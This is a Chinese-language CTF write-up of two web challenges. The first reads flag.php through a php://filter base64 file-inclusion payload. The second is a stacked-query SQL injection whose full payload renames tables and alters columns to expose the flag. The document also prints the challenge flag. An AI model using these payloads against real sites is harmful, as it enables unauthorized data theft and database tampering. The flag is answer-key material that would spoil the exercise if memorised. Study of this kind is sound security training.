题目一:
进入题目
废话不多说直接查看源代码
发现可疑点,点开看看
得到新源码
发现新文件action.php,打开看看
打开之后开发现了这个
但是看网址感觉有点奇怪
后缀为什么不是原想的action.php而是变为了end.php
看了看网页提示的话,进行抓包.
利用 BurpLoader 进行抓包
发现隐藏文件secr3t.php
打开发现
感觉胜利就在眼前了
打开flag.php
联想到php伪协议, 在后面加上
?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base64编码
解码有
得到flag为
flag{6e4eb0b7-496b-4cba-9db9-ae462e900e57}
题目二:
进入题目
容易看出是SQL注入的题目
先输入1' or 1=1;#试试看能否得到有用信息
目前看来并没有
输入1’; show tables;#
发现两个表,看看里面有什么。
分别输入
0'; show columns from `words`;#
0'; show columns from `1919810931114514`;#
得到
和
发现flag在1919810931114514这个表中
但是通过前面做题过程中,发现可以看到words表里有两个分别为id 和data
而1919810931114514表里只有一个属性列
那么输入框大概率查询的为words表。
可进行如下操作:
1.先将 words 改为别的名字
2.然后将 1919810931114514 改为 words
3.把属性名flag改为id,通过1’ or 1=1;# 显示flag出来
4.在这之前要先把words表改名
构造playload如下
1';rename table words to words2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE words CHANGE flag data VARCHAR(100);-- q
然后输入1';show tables—q
得到
输入1' or 1=1;#
得到flag